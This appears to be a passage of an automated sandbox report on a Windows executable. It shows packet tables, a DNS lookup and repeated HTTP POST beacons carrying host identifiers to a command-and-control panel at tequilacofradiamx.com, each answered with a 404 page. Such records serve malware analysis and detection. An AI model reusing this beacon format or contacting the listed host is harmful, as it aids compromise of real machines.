Apr 18, 2024 23:01:58.984033108 CEST	80	49733	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:58.984152079 CEST	49733	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:59.179012060 CEST	80	49733	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:59.179377079 CEST	80	49733	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:59.179420948 CEST	80	49733	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:59.179456949 CEST	80	49733	91.92.253.228	192.168.2.4
Apr 18, 2024 23:01:59.179491997 CEST	49733	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:01:59.179579020 CEST	49733	80	192.168.2.4	91.92.253.228
Apr 18, 2024 23:02:00.892436028 CEST	49733	80	192.168.2.4	91.92.253.228

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 18, 2024 23:01:56.190624952 CEST	61334	53	192.168.2.4	1.1.1.1
Apr 18, 2024 23:01:56.447998047 CEST	53	61334	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 18, 2024 23:01:56.190624952 CEST	192.168.2.4	1.1.1.1	0x63a7	Standard query (0)	tequilacofradiamx.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Apr 18, 2024 23:01:56.447998047 CEST	1.1.1.1	192.168.2.4	0x63a7	No error (0)	tequilacofradiamx.com		91.92.253.228	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

tequilacofradiamx.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49730	91.92.253.228	80	6464	C:\Users\user\Desktop\lqoUUYTMsL.exe

Timestamp	Bytes transferred	Direction	Data
Apr 18, 2024 23:01:56.652271986 CEST	290	OUT	POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tequilacofradiamx.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D0B62332 Content-Length: 176 Connection: close
Apr 18, 2024 23:01:56.848431110 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones216041JONES-PCk0FDD42EE188E931437F4FBE2CoQjSb
Apr 18, 2024 23:01:57.045268059 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Thu, 18 Apr 2024 21:01:57 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT ETag: "6164b-587-616449379118c" Accept-Ranges: bytes Content-Length: 1415 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
Apr 18, 2024 23:01:57.045308113 CEST	403	IN	Data Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20 Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49731	91.92.253.228	80	6464	C:\Users\user\Desktop\lqoUUYTMsL.exe

Timestamp	Bytes transferred	Direction	Data
Apr 18, 2024 23:01:57.372627020 CEST	290	OUT	POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tequilacofradiamx.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D0B62332 Content-Length: 176 Connection: close
Apr 18, 2024 23:01:57.566701889 CEST	176	OUT	Data Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: 'ckav.rujones216041JONES-PC+0FDD42EE188E931437F4FBE2CvReyt
Apr 18, 2024 23:01:57.760746956 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Thu, 18 Apr 2024 21:01:58 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT ETag: "6164b-587-616449379118c" Accept-Ranges: bytes Content-Length: 1415 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
Apr 18, 2024 23:01:57.760791063 CEST	403	IN	Data Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20 Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49732	91.92.253.228	80	6464	C:\Users\user\Desktop\lqoUUYTMsL.exe

Timestamp	Bytes transferred	Direction	Data
Apr 18, 2024 23:01:58.045439959 CEST	290	OUT	POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tequilacofradiamx.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D0B62332 Content-Length: 149 Connection: close
Apr 18, 2024 23:01:58.240035057 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones216041JONES-PC0FDD42EE188E931437F4FBE2C
Apr 18, 2024 23:01:58.434952021 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Thu, 18 Apr 2024 21:01:58 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT ETag: "6164b-587-616449379118c" Accept-Ranges: bytes Content-Length: 1415 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><bo
Apr 18, 2024 23:01:58.434993982 CEST	403	IN	Data Raw: 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 2f 22 3e 74 65 71 75 69 6c 61 63 6f 66 72 61 64 69 61 6d 78 2e 63 6f 6d 3c 2f 61 3e 3c 2f 70 3e 0a 20 Data Ascii: dy> <p><a href="http://tequilacofradiamx.com/">tequilacofradiamx.com</a></p> <h1>404</h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start aga

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49733	91.92.253.228	80	6464	C:\Users\user\Desktop\lqoUUYTMsL.exe

Timestamp	Bytes transferred	Direction	Data
Apr 18, 2024 23:01:58.789410114 CEST	290	OUT	POST /minyhug/fxgsfhsdtytdjfudyjfjewrwsejyt/Panel/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: tequilacofradiamx.com Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: D0B62332 Content-Length: 149 Connection: close
Apr 18, 2024 23:01:58.984152079 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 32 00 31 00 36 00 30 00 34 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones216041JONES-PC0FDD42EE188E931437F4FBE2C
Apr 18, 2024 23:01:59.179377079 CEST	1289	IN	HTTP/1.1 404 Not Found Date: Thu, 18 Apr 2024 21:01:59 GMT Server: Apache/2.2.15 (CentOS) Last-Modified: Wed, 17 Apr 2024 06:00:48 GMT ETag: "6164b-587-616449379118c" Accept-Ranges: bytes Content-Length: 1415 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 